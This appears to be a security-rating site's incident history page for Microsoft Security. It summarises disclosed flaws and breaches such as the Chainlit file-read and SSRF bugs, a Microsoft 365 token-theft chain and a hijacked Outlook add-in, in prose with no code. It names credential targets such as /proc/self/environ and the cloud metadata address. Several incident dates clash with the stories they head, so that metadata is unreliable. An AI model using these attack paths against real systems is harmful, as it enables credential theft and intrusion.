Critical Vulnerabilities in Chainlit AI Framework Expose Sensitive Data and Enable Lateral Movement Security researchers at Zafran Security have uncovered two high-severity vulnerabilities collectively dubbed ChainLeak in Chainlit, a widely used open-source AI framework for building conversational chatbots. The flaws, tracked as CVE-2026-22218 (CVSS 7.1) and CVE-2026-22219 (CVSS 8.3), could allow authenticated attackers to steal sensitive data, escalate privileges, and move laterally within compromised systems. ### Key Vulnerabilities and Exploit Scenarios 1. CVE-2026-22218 (Arbitrary File Read) - Affects the `/project/element` update flow due to insufficient validation of user-controlled fields. - Enables attackers to read any file accessible to the service, including system environment variables (`/proc/self/environ`), which may contain API keys, credentials, and internal file paths. - If Chainlit uses SQLAlchemy with SQLite, attackers could also exfiltrate database files. 2. CVE-2026-22219 (Server-Side Request Forgery - SSRF) - Exploitable when Chainlit is configured with the SQLAlchemy data layer backend. - Allows attackers to send arbitrary HTTP requests to internal network services or cloud metadata endpoints (e.g., AWS EC2 IMDSv1 at `169.254.169.254`). - If deployed on AWS EC2 with IMDSv1, this could lead to retrieving IAM role credentials, enabling further lateral movement within the cloud environment. Zafran researchers warned that combining these flaws could collapse AI application security, turning a seemingly contained issue into full system compromise. ### Impact and Adoption - Chainlit has seen 7.3 million total downloads, with 220,000 in the past week alone, per Python Software Foundation data. - The vulnerabilities were responsibly disclosed on November 23, 2025, and patched in Chainlit v2.9.4 (released December 24, 2025). ### Broader AI Security Concerns Zafran highlighted that as organizations rapidly adopt AI frameworks, traditional vulnerabilities (like SSRF and arbitrary file reads) are being embedded into AI infrastructure, creating new attack surfaces. ### Parallel Discovery: Microsoft MarkItDown MCP Server Flaw Separately, BlueRock disclosed an SSRF vulnerability (MCP fURI) in Microsoft’s MarkItDown Model Context Protocol (MCP) server, affecting AWS EC2 instances using IMDSv1. The flaw allows arbitrary URI calls, enabling: - Privilege escalation via metadata service access. - Data leakage through unrestricted URI requests. - AWS credential theft if an IAM role is attached to the instance. BlueRock’s analysis of 7,000 MCP servers found that 36.7% are likely exposed to similar SSRF risks. While mitigation steps (e.g., IMDSv2, private IP blocking, and allowlists) were suggested, the findings underscore persistent risks in AI and cloud-native environments.
INCIDENT DETAILS -
TYPE
Data BreachPrivilege EscalationLateral Movement
IMPACT
API keysCredentialsInternal file pathsDatabase filesIAM role credentialsChainlit AI FrameworkAWS EC2 instances with IMDSv1Operational Impact: Potential full system compromise and lateral movement within cloud environmentsBrand Reputation Impact: Potential erosion of trust in AI frameworks and cloud securityIdentity Theft Risk: High (if PII or credentials are exposed)
DATA BREACH
API keysCredentialsDatabase filesIAM role credentialsEnvironment variablesSensitivity Of Data: High (credentials, PII, cloud metadata)Data Exfiltration: Possible via SSRF and arbitrary file readDatabase files (SQLite)Environment files (/proc/self/environ)Internal configuration filesPersonally Identifiable Information: Possible if stored in exposed files
OCTOBER 2025
749Before Incident
SEPTEMBER 2025
748Before Incident
JUNE 2025
760Before Incident
Cyber Attack
16 Jun 2025Microsoft Security
House of Commons (Canada)

Cyber Attack on Canada's House of Commons via Microsoft SharePoint Zero-Day Exploit

743After Incident
HIGH-17
HOU1043082025
Canada’s House of Commons suffered a cyber attack exploiting a zero-day vulnerability in Microsoft SharePoint (CVE-2025-53770, CVSS 9.8). Hackers, suspected to be the China-linked APT group Salt Typhoon, breached a database containing employee information, including names, job titles, office locations, email addresses, and details of House-managed computers and mobile devices. While no group has claimed responsibility, the attack aligns with a broader pattern of Chinese state-sponsored cyber intrusions targeting Canadian government networks over the past four years. The stolen data poses risks of tailored phishing and impersonation attacks against officials. Investigations are ongoing, but the breach exposes internal configurations and heightens concerns over follow-on social engineering campaigns. The incident underscores vulnerabilities in critical Microsoft platforms, with similar exploits recently affecting organizations like Google and the US Department of Health and Human Services.
INCIDENT DETAILS -
TYPE
Data BreachUnauthorized AccessAPT Attack
MOTIVATION
EspionageData ExfiltrationPotential Future Phishing Campaigns
IMPACT
House of Commons database managing computers and mobile devicesRisk of phishing/impersonation attacks using stolen employee dataOngoing investigationPotential erosion of trust in government cybersecurityMedia scrutinyHigh (employee names, job titles, email addresses, device details exposed)
DATA BREACH
Employee namesJob titlesOffice locationsEmail addressesHouse-managed computer/mobile device detailsModerate to High (PII + internal IT asset details)Database records
MAY 2025
779Before Incident
Cyber Attack
01 May 2025Microsoft Security
Microsoft: Microsoft shuts down illegal code-signing operation used by ransomware crims to mask their malware

Microsoft Disrupts Fox Tempest Cybercrime Operation Selling Code-Signing Certificates to Ransomware Gangs

758After Incident
CRITICAL-21
MIC1779231548
Microsoft Disrupts Fox Tempest Cybercrime Operation Selling Code-Signing Certificates to Ransomware Gangs Microsoft has seized websites and dismantled hundreds of virtual machines linked to Fox Tempest, a cybercrime service that sold fraudulent code-signing certificates to ransomware groups, enabling malware to bypass security checks by appearing as legitimate software. The operation, active since May 2025, exploited Microsoft’s Artifact Signing service by creating over 580 fake accounts under stolen identities to obtain and resell valid certificates. Among Fox Tempest’s customers was the ransomware group Vanilla Tempest (also known as Vice Spider, Vice Society, and Rhysida), which used the certificates to sign malware including the Oyster backdoor, Lumma and Vidar infostealers, and Rhysida ransomware facilitating unauthorized access, data theft, and extortion. Microsoft’s investigation also tied the operation to other ransomware affiliates, such as INC, Qilin, and Akira. Between February and March 2025, Microsoft’s Digital Crimes Unit (DCU) conducted undercover test purchases, posing as a buyer to document the service’s operations. Prices ranged from $5,000 for standard certificates to $9,500 for expedited delivery, with payments processed via cryptocurrency. The DCU traced transactions to wallets controlled by the operators, identified in court documents as John Doe 1 and 2 (alias SamCodeSign). The impact was widespread: Microsoft confirmed thousands of infected machines in the U.S., including at least 12 of its own systems, were compromised by malware signed with Fox Tempest’s certificates. The civil complaint, unsealed on Tuesday, describes ongoing criminal activity, including unauthorized access, data exfiltration, and ransomware deployment.
INCIDENT DETAILS -
TYPE
Cybercrime Operation Disruption
MOTIVATION
Financial gainRansomware deploymentData exfiltration
IMPACT
Data Compromised: Malware-signed data (Oyster backdoor, Lumma/Vidar infostealers, Rhysida ransomware)Systems Affected: Thousands of infected machines in the U.S., including at least 12 Microsoft systemsOperational Impact: Unauthorized access, data theft, and ransomware deploymentBrand Reputation Impact: Potential reputational damage due to abuse of Microsoft's servicesIdentity Theft Risk: Stolen identities used to create fake accounts
DATA BREACH
Malware payloadsStolen identitiesSensitivity Of Data: High (code-signing certificates, malware, PII used for fake accounts)Executables signed with fraudulent certificatesPersonally Identifiable Information: Stolen identities used to create fake accounts
Cyber Attack
01 May 2025Microsoft Security
F5 Inc.

Unauthorized Access to F5 Inc.'s BIG-IP Development Environment by Nation-State Threat Actor

758After Incident
CRITICAL-21
F52002820101625
In August 2025, F5 Inc. suffered a sophisticated cyberattack by a nation-state threat actor, who gained long-term unauthorized access to its BIG-IP product development environment and engineering knowledge management platform. The attackers exfiltrated portions of the BIG-IP source code, details of undisclosed vulnerabilities under active development, and customer configuration/implementation data (affecting a small percentage of clients). While F5 confirmed no evidence of supply chain tampering (source code, build, or release pipelines) or active exploitation of undisclosed flaws, the breach exposed proprietary intellectual property and sensitive customer-specific deployment information.F5 contained the incident, engaged external cybersecurity firms, and collaborated with law enforcement. Mitigation steps included credential rotation, access control hardening, network security enhancements, and automated patch management. Customers were urged to update BIG-IP software immediately, adopt threat hunting guides, and monitor for suspicious activity via SIEM integration. F5 also partnered with CrowdStrike to offer free Falcon EDR subscriptions for extended threat detection. Direct outreach was initiated to affected customers whose data may have been exposed, though no critical remote code execution vulnerabilities were confirmed as leaked or exploited.
INCIDENT DETAILS -
TYPE
Cyber EspionageData BreachUnauthorized Access
MOTIVATION
EspionageIntellectual Property TheftReconnaissance for Future Exploits
IMPACT
BIG-IP Source Code (Portions)Undisclosed Vulnerability InformationCustomer Configuration/Implementation Data (Small Percentage)BIG-IP Product Development EnvironmentEngineering Knowledge Management PlatformIncident Response ActivationCustomer NotificationsSoftware Updates and Hardening GuidanceBrand Reputation Impact: Potential Reputation Risk Due to Breach of Trust and Source Code Exposure
DATA BREACH
Source Code (BIG-IP)Undisclosed Vulnerability ResearchCustomer Configuration/Implementation DataSensitivity Of Data: High (Source Code, Vulnerability Details, Customer-Specific Configurations)Source Code FilesEngineering DocumentationCustomer Configuration Files
Vulnerability
01 May 2025Microsoft Security
Microsoft: Phishing and OAuth Token Vulnerabilities Lead to Full Microsoft 365 Breach

Microsoft 365 Environments Exposed by Chained Vulnerabilities in Email APIs and OAuth Token Leaks

758After Incident
CRITICAL-21
MIC1770359629
Microsoft 365 Environments Exposed by Chained Vulnerabilities in Email APIs and OAuth Token Leaks Security researchers have uncovered a high-impact attack chain exploiting two medium-severity vulnerabilities in Microsoft 365 environments, enabling authenticated phishing that bypasses email security controls and grants persistent access to corporate systems. The first flaw involves unsecured email API endpoints commonly found in newsletter signup forms or contact pages that lack proper input validation. Attackers can manipulate JSON payloads to send phishing emails directly from an organization’s legitimate mail servers, evading SPF, DKIM, and DMARC protections. These emails appear to originate from trusted internal sources, such as IT or HR, increasing the likelihood of successful deception. The second vulnerability stems from verbose error messages in production environments. When malformed requests trigger stack traces, poorly configured servers may expose active OAuth 2.0 bearer tokens, including JSON Web Tokens (JWT) for Microsoft Graph API. These tokens often grant broad permissions to user directories, Teams channels, and SharePoint files. By chaining these weaknesses, attackers can execute a multi-stage assault: 1. Reconnaissance & Extraction – Triggering verbose errors to harvest valid OAuth tokens. 2. Data Theft – Using the tokens to query Microsoft Graph API and download employee directories, identifying high-value targets. 3. Targeted Phishing – Leveraging the compromised email endpoint to send "authenticated" phishing messages, appearing as legitimate internal communications. 4. Persistence – Regenerating tokens by re-exploiting the error condition, maintaining access even if credentials change. The attack underscores the risks of seemingly minor misconfigurations, as medium-severity flaws can combine to create critical security gaps. Organizations are advised to enforce strict input validation on public-facing forms and restrict error messages in production to prevent sensitive data exposure. According to Verizon’s 2025 Data Breach Investigations Report, email remains the primary attack vector, with human error driving 60% of breaches.
INCIDENT DETAILS -
TYPE
Phishing, Data Theft, Persistent Access
IMPACT
Data Compromised: Employee directories, Teams channels, SharePoint filesSystems Affected: Microsoft 365 environments (email servers, Graph API, SharePoint, Teams)Operational Impact: Persistent unauthorized access, bypassed email security controlsIdentity Theft Risk: High (exposure of employee directories and sensitive data)
DATA BREACH
Type Of Data Compromised: Employee directories, Teams channels, SharePoint filesSensitivity Of Data: High (personally identifiable information, corporate data)Data Exfiltration: YesPersonally Identifiable Information: Yes
JANUARY 2024
775Before Incident
Vulnerability
01 Jan 2024Microsoft Security
Auth0, RabbitMQ and Microsoft: RabbitMQ Vulnerability Exposes OAuth Secrets to Attackers

Critical RabbitMQ Vulnerability (CVE-2026-5721) Exposes OAuth Client Secrets

771After Incident
CRITICAL-4
RABMICAUT1784010304
Critical RabbitMQ Vulnerability (CVE-2026-5721) Exposes OAuth Client Secrets A newly disclosed vulnerability in RabbitMQ, tracked as CVE-2026-5721, allows unauthenticated attackers to extract a broker’s confidential OAuth client secret, potentially enabling full administrative control over messaging infrastructure. The flaw, rated 8.7 (High) on the CVSS scale, stems from an exposed management endpoint in RabbitMQ’s web interface that returns the secret without authentication. The issue affects RabbitMQ versions 3.13.0 and later, introduced in early 2024, and is particularly dangerous in deployments using OAuth 2.0 or OpenID Connect (e.g., Auth0, Azure AD/Entra ID, Keycloak, or UAA). Exploitation could grant attackers admin-level access, allowing them to manipulate users, queues, messages, and broker configurations. Systems without a configured client secret or those not using the management plugin are unaffected. Security firm Miggo highlighted that the risk is highest when the management interface is exposed to untrusted networks, such as cloud or multi-tenant environments. Patches have been released in RabbitMQ versions 4.3.0, 4.2.6, 4.1.11, 4.0.20, and 3.13.15. The updates also address CVE-2026-57221 (CVSS 5.3), a medium-severity flaw allowing authenticated users to enumerate queues and exchanges, potentially aiding reconnaissance for future attacks especially in shared virtual host environments. While no active exploitation has been observed, Miggo noted that both vulnerabilities stem from long-standing code inconsistencies, underscoring risks in widely deployed software. Organizations are urged to patch affected systems and restrict management interface access.
INCIDENT DETAILS -
TYPE
Vulnerability Exploitation
IMPACT
Data Compromised: OAuth client secrets, administrative access to messaging infrastructureSystems Affected: RabbitMQ deployments using OAuth 2.0/OpenID Connect with exposed management interfaceOperational Impact: Potential full administrative control over messaging infrastructure, manipulation of users/queues/messages/broker configurations
DATA BREACH
Type Of Data Compromised: OAuth client secretsSensitivity Of Data: High (confidential credentials enabling administrative access)
JANUARY 2022
777Before Incident
Cyber Attack
01 Jan 2022Microsoft Security
Microsoft: Malicious Microsoft Outlook Add-in Stole 4,000 Account Credentials and Credit Card Details

Microsoft Outlook Add-In Hijacked in 'Zombie' Phishing Attack, Stealing Credentials and Payment Data

758After Incident
CRITICAL-19
MIC1770908198
Microsoft Outlook Add-In Hijacked in "Zombie" Phishing Attack, Stealing Credentials and Payment Data Security researchers at Koi AI have uncovered a novel phishing campaign exploiting a dormant Microsoft Outlook add-in, dubbed "AgreeTo", to steal Microsoft account logins, passwords, credit card details, and bank security answers from thousands of users. Originally released in 2022 as a legitimate meeting scheduler, AgreeTo was abandoned by its developer, allowing its hosting domain (outlook-one.vercel.app) to expire. Since Office add-ins function as web pages loaded in an iframe within Outlook rather than static downloads attackers seized control of the abandoned subdomain, instantly gaining access to the add-in’s interface without requiring reapproval from Microsoft. The add-in’s 2022 manifest file, which passed Microsoft’s initial security review, granted it “ReadWriteItem” permissions, enabling it to read and modify emails. Once hijacked, the attackers replaced the original scheduler with a fake Microsoft login page, tricking users into entering credentials. A malicious script then harvested emails, passwords, IP addresses, credit card numbers, and security question answers, exfiltrating the data to a Telegram bot controlled by the attackers. Koi AI infiltrated the bot’s channel, recovering evidence of over 4,000 victims, with attackers actively testing stolen credentials at the time of discovery. While Microsoft removed the add-in from its store, phishing sites remained active, and no CVE has been assigned. The incident highlights a critical flaw in Microsoft’s add-in security model: once approved, add-ins are never rechecked, even if their underlying web content changes. Unlike traditional malware, this "zombie" attack leverages dynamic dependencies add-ins that update silently without user or vendor oversight. While the attackers in this case focused on phishing, the same technique could have enabled email spoofing, inbox surveillance, or further lateral movement within compromised accounts. The attack underscores broader supply chain risks in modern applications, where third-party dependencies can become vectors for exploitation long after initial deployment. Microsoft has not yet announced mitigations, but potential fixes could include runtime URL validation, periodic manifest re-reviews, or sandboxing to limit add-in privileges.
INCIDENT DETAILS -
TYPE
Phishing
MOTIVATION
Financial gain (credential theft, payment data exfiltration)
IMPACT
Data Compromised: Microsoft account logins, passwords, credit card details, bank security answers, emails, IP addressesSystems Affected: Microsoft Outlook with 'AgreeTo' add-in installedOperational Impact: Potential unauthorized access to emails, lateral movement within compromised accountsBrand Reputation Impact: Potential reputational damage to Microsoft due to add-in security flawsIdentity Theft Risk: High (stolen credentials and PII)Payment Information Risk: High (credit card and bank security answers stolen)
DATA BREACH
CredentialsPayment informationPersonally identifiable information (PII)EmailsIP addressesNumber Of Records Exposed: Over 4,000Sensitivity Of Data: High (financial and authentication data)Data Exfiltration: Yes (exfiltrated to Telegram bot)Personally Identifiable Information: Yes (credentials, security answers, IP addresses)
MARCH 2021
789Before Incident
Cyber Attack
02 Mar 2021Microsoft Security
Microsoft: Alleged Chinese hacker extradited to US over cyberattacks targeting COVID-19 research

Chinese National Extradited to U.S. in Major Cyber Espionage Case Linked to MSS

772After Incident
CRITICAL-17
MIC1777386894
Chinese National Extradited to U.S. in Major Cyber Espionage Case Linked to MSS A Chinese national, Xu Zewei, was extradited from Italy to the United States to face charges for his alleged role in a large-scale cyber espionage campaign orchestrated by China’s Ministry of State Security (MSS). Xu, alongside co-conspirator Zhang Yu who remains at large is accused of breaching thousands of computers worldwide while employed by Shanghai Powerock Network Co. Ltd., a firm prosecutors describe as a front for state-sponsored hacking operations. The campaign targeted U.S. universities, COVID-19 research organizations, and law firms, with attackers seeking sensitive data on vaccines, treatments, and testing. Prosecutors also link Xu to the HAFNIUM operation, which exploited vulnerabilities in Microsoft Exchange Server in 2021 to compromise email systems and infiltrate victim networks. The attacks, disclosed by Microsoft in March 2021, prompted emergency security updates from U.S. agencies, including the FBI and CISA, after affecting over 12,700 U.S. organizations. According to court documents, Xu and his associates installed web shells on exploited servers, enabling remote access and data exfiltration. Victims included a university in Texas and a global law firm with offices in Washington, D.C. The MSS, including its Shanghai State Security Bureau (SSSB), allegedly directed the hacking, leveraging a network of private contractors to obscure its involvement. Xu faces charges of wire fraud, computer intrusion, and aggravated identity theft, with potential prison sentences ranging from two to 20 years per count. U.S. officials emphasized that China’s use of third-party contractors in cyber operations has led to indiscriminate targeting, leaving systems vulnerable to further exploitation and enabling the sale of stolen data to other malicious actors. The case underscores the MSS’s reliance on private entities to conduct state-backed cyber espionage while distancing itself from direct attribution.
INCIDENT DETAILS -
TYPE
Cyber Espionage
MOTIVATION
State-sponsored espionage, theft of sensitive data (COVID-19 research, legal information)
IMPACT
Data Compromised: Sensitive data on vaccines, treatments, testing, and legal informationSystems Affected: Email systems, victim networksOperational Impact: Compromised email systems, unauthorized remote accessIdentity Theft Risk: High (aggravated identity theft charges)
DATA BREACH
COVID-19 research dataLegal informationEmail communicationsSensitivity Of Data: High (sensitive research, legal, and personal data)Data Exfiltration: YesPersonally Identifiable Information: Yes (aggravated identity theft charges)
FEBRUARY 2020
788Before Incident
Vulnerability
01 Feb 2020Microsoft Security
Microsoft: Chinese State-Sponsored Contract Hacker Extradited to U.S. Over COVID-19 Research Cyberattacks – HSToday

Chinese National Extradited to U.S. for Cyber Intrusions Linked to HAFNIUM and COVID-19 Research Theft

788After Incident
CRITICAL0
MIC1777372097
Chinese National Extradited to U.S. for Cyber Intrusions Linked to HAFNIUM and COVID-19 Research Theft A 34-year-old Chinese national, Xu Zewei (徐泽伟), was extradited to the U.S. over the weekend and appeared in federal court in Houston on a nine-count indictment for his role in state-sponsored cyber intrusions between February 2020 and June 2021. Xu, along with co-conspirator Zhang Yu (张宇), 44, is accused of participating in the HAFNIUM campaign a large-scale hacking operation that compromised thousands of systems worldwide, including U.S. organizations and targeting COVID-19 research during the pandemic. According to court documents, Xu’s activities were directed by officers of the PRC’s Ministry of State Security (MSS) Shanghai State Security Bureau (SSSB), China’s primary intelligence agency. At the time of the intrusions, Xu worked for Shanghai Powerock Network Co. Ltd., one of many Chinese "enabling" companies used by the PRC government to conduct cyber operations while obscuring its direct involvement. The indictment alleges that in early 2020, Xu and his co-conspirators hacked U.S. universities, immunologists, and virologists working on COVID-19 vaccines, treatments, and testing. On February 19, 2020, Xu confirmed to an SSSB officer that he had breached a Texas-based research university’s network. Days later, the officer instructed him to target specific email accounts belonging to researchers, which Xu later accessed and exfiltrated. From late 2020 into 2021, Xu and Zhang exploited vulnerabilities in Microsoft Exchange Server, a widely used email platform, as part of the HAFNIUM campaign. Microsoft publicly disclosed the state-sponsored attacks in March 2021, prompting the release of patches and detection tools. Despite mitigation efforts, hundreds of U.S. systems remained compromised. In April 2021, the U.S. Justice Department conducted a court-authorized operation to remove web shells installed by the hackers. By July 2021, the U.S. and its allies formally attributed the HAFNIUM campaign to the PRC’s MSS. Among the victims were a second Texas university and a global law firm, where Xu and Zhang installed web shells to maintain access and search for sensitive information. Their searches included terms like "Chinese sources," "MSS," and "HongKong," suggesting an interest in U.S. policy and intelligence-related data. The indictment highlights the PRC’s use of private contractors to conduct cyber espionage, allowing the government to distance itself from the operations. Xu faces charges including conspiracy to commit wire fraud, unauthorized access to protected computers, intentional damage to computer systems, and aggravated identity theft, with potential penalties totaling decades in prison. Zhang remains at large. The case is being investigated by the FBI’s Houston Field Office and prosecuted by the U.S. Attorney’s Office for the Southern District of Texas and the DOJ’s National Security Cyber Section. Xu’s extradition from Italy was secured with assistance from Italian law enforcement, including the Polizia Postale.
INCIDENT DETAILS -
TYPE
Cyber EspionageState-Sponsored Hacking
MOTIVATION
Intelligence gatheringTheft of COVID-19 researchPolicy and intelligence-related data
IMPACT
Data Compromised: Sensitive research data, email accounts, policy-related informationU.S. universitiesGlobal law firmResearch institutionsOperational Impact: Unauthorized access and data exfiltration from critical research and legal entitiesIdentity Theft Risk: Aggravated identity theft (charges included)
DATA BREACH
Research dataEmail accountsPolicy-related informationSensitivity Of Data: High (COVID-19 research, intelligence-related data)Personally Identifiable Information: Email accounts of researchers (potential PII)

Frequently Asked Questions

?
What is the current A.I Rankiteo Cyber Score for Microsoft Security ?
?
What was Microsoft Security's A.I Rankiteo Cyber Score in July 2026 ?
?
What was Microsoft Security's A.I Rankiteo Cyber Score in June 2026 ?
?
What was Microsoft Security's A.I Rankiteo Cyber Score in May 2026 ?
?
What was Microsoft Security's A.I Rankiteo Cyber Score in April 2026 ?
?
What was Microsoft Security's A.I Rankiteo Cyber Score in March 2026 ?
?
What was Microsoft Security's A.I Rankiteo Cyber Score in February 2026 ?
?
What was Microsoft Security's A.I Rankiteo Cyber Score in January 2026 ?
?
What was Microsoft Security's A.I Rankiteo Cyber Score in December 2025 ?
?
What was Microsoft Security's A.I Rankiteo Cyber Score in November 2025 ?
?
What was Microsoft Security's A.I Rankiteo Cyber Score in October 2025 ?
?
What was Microsoft Security's A.I Rankiteo Cyber Score in September 2025 ?
?
What is the average per-incident point impact on Microsoft Security's A.I Rankiteo Cyber Score over the past 12 months ?
?
Where can I access detailed records of all cyber incidents associated with Microsoft Security ?
?
Where can I find a summary of the A.I Rankiteo Risk Scoring methodology ?
?
Where can I view Microsoft Security's profile page on Rankiteo ?
?
How accurate is the A.I Rankiteo Risk Scoring methodology ?
Microsoft Security Cyber Scoring History | Rankiteo